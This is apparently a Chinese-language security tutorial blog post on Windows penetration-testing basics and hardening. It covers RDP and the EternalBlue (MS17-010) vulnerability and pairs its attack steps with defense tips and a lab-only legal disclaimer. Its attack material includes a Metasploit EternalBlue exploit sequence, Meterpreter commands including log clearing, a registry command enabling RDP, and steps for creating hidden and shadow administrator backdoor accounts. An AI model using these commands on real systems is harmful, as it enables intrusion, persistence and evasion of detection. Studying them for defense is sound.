一、Windows 系统基础认知：安全攻防的前提

1.1 为什么必须学 Windows 系统基础？

1. 企业内网、个人办公设备中 Windows 占比超 80%，是渗透测试的首要靶标；
2. 系统基础是理解漏洞原理、工具使用的核心，避免 “知其然不知其所以然”。

1.2 主流操作系统对比

操作系统	核心特点	应用场景
Windows	图形友好、兼容性强	企业服务器、办公电脑、工业设备
Linux	开源稳定、安全性高	服务器、渗透测试环境
macOS	生态闭环、体验佳	设计、开发工作站

1.3 Windows 版本差异与渗透风险

Windows 版本直接决定攻击难度，老旧系统是内网安全的重灾区：

1. 老旧个人系统（高风险）代表：Windows 7（已停止官方支持）场景：制造业 CNC 设备、医疗影像终端、老旧办公电脑漏洞：系统补丁缺失、默认防御极弱，易成为内网突破入口
2. 现代个人系统（高防御）代表：Windows 10/11场景：企业办公终端、开发者主机防护：TPM 2.0、BitLocker 加密，攻击难度大幅提升
3. 服务器系统（高价值目标）代表：Windows Server 2008/2012/2019/2022场景：文件、数据库、Web 服务器、域控制器靶点：SMB、RDP、IIS 等核心服务配置漏洞

1.4 核心服务：RDP 远程桌面（3389 端口）

RDP 是 Windows 专属远程控制协议，默认端口 3389，是远程办公、服务器管理的核心，也是高频攻击靶点。

开启方式

• 图形化：此电脑→属性→远程设置→允许远程连接
• 命令行（管理员 CMD）：

cmd

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

连接前提

同网段、开启远程、账号有密码、防火墙放行

🔴 真实安全案例：RDP 弱口令爆破导致企业服务器沦陷某小微企业为方便运维，开启服务器 3389 默认端口，管理员使用admin/123456弱口令。黑客通过端口扫描工具发现开放端口，用暴力破解工具 10 分钟破解密码，直接登录服务器删除财务数据，索要 5000 元赎金才恢复数据。✅ 防护启示：修改 RDP 默认端口、设置强密码、配置 IP 白名单，禁止公网直接开放 3389。

---

二、Windows 致命漏洞：MS17-010（永恒之蓝）攻防全解

2.1 漏洞核心背景

• 披露时间：2017 年 4 月
• 衍生攻击：2017 年 5 月WannaCry 勒索病毒全球爆发
• 原理：利用SMBv1 协议缓冲区溢出漏洞，无需用户交互，远程执行恶意代码

2.2 SMB 协议基础

SMB 是文件 / 打印机共享协议，依赖TCP 139、445 端口，是永恒之蓝的攻击载体。

2.3 漏洞利用实验（Kali+Win7，仅靶场测试）

1. 漏洞扫描：

bash

nmap --script smb-vuln* 192.168.157.130

1. 启动 Metasploit：

bash

msfconsole

1. 加载模块：

bash

use exploit/windows/smb/ms17_010_eternalblue

1. 配置参数：

bash

set rhosts 192.168.157.130
set lhost 192.168.157.129

1. 执行攻击：

bash

exploit

2.4 Meterpreter 核心命令

命令	功能
ps	查看目标进程
screenshot	截取目标屏幕
shell	获取目标 CMD
clearev	清除系统日志
download	下载目标文件

🔴 真实安全案例：WannaCry 席卷全球，医院企业全面瘫痪2017 年 WannaCry 勒索病毒利用永恒之蓝漏洞，1 天内感染 150 + 国家设备：国内多家医院 HIS 系统瘫痪，患者无法挂号、手术；某物流企业仓储系统被加密，货物收发停滞，3 天直接损失超 1000 万元。病毒加密文件后索要比特币赎金，且无解密保障。✅ 防护启示：禁用 SMBv1、安装 MS17-010 补丁、封禁 445 端口。

2.5 永恒之蓝终极防御策略

1. 禁用 SMBv1 协议：控制面板→程序→关闭 Windows 功能→取消 SMB 1.0
2. 安装补丁：KB4012212/KB4012215
3. 防火墙封禁 139/445 端口
4. 开启杀毒软件实时防护

---

三、Windows 账户与权限管理：堵住后门漏洞

3.1 账户类型与权限

账户类型	权限	适用场景
管理员	完全控制系统	服务器运维、系统配置
标准用户	仅操作个人文件	日常办公、普通员工

3.2 NTFS 文件权限配置

右键文件→属性→安全，可分配读取、修改、完全控制等权限，遵循最小权限原则。

3.3 CMD 账户管理命令

cmd

net user                  # 查看所有用户
net user test 123456 /add # 创建用户
net localgroup administrators test /add # 提权管理员
net user test /delete     # 删除用户

3.4 高危后门：隐藏用户 & 影子用户

1. 隐藏用户：用户名加$，默认不显示

cmd

net user hack$ 123456 /add

1. 影子用户：注册表复制管理员权限，极难排查路径：HKEY_LOCAL_MACHINE\SAM\SAM，替换管理员 F 键值

🔴 真实安全案例：影子用户潜伏 3 个月，窃取企业核心数据某互联网公司服务器被黑客入侵，通过注册表创建影子用户，复制管理员权限，常规 “计算机管理” 无法发现。黑客利用该账户长期窃取客户数据、篡改业务系统，3 个月后才通过注册表排查发现，直接经济损失超 200 万元。✅ 防护启示：定期检查注册表 SAM 项、用命令net user $用户名排查隐藏用户、禁用多余管理员账户。

---

四、漏洞扫描神器：Goby 快速排查系统风险

Goby 是轻量化漏洞扫描工具，扫描快、误报低，支持 Windows/Linux 系统，是内网安全自查、渗透前期探测的必备工具。

• 核心功能：资产梳理、漏洞扫描、端口探测
• 使用场景：企业内网自查、渗透测试靶场扫描
• 前置依赖：安装 Npcap 组件

---

五、Windows 系统安全防护总结

1. 系统层：禁用 SMBv1、及时打补丁、升级老旧系统
2. 服务层：关闭不必要端口（3389/445/139）、修改默认端口
3. 账户层：强密码策略、禁用隐藏 / 影子用户、最小权限分配
4. 工具层：定期用 Goby 扫描漏洞、开启 Windows Defender

Windows 安全没有一劳永逸的方案，只有持续加固、定期排查，才能守住系统与数据安全的底线。

---

⚠️ 法律声明

本文所有渗透操作仅适用于授权靶场测试，严禁对未授权设备发起攻击，违者将承担《网络安全法》《刑法》相关法律责任！

---

文末互动

觉得文章有用的话，点赞 + 收藏 + 关注，后续持续更新 Windows 安全、渗透测试实战干货！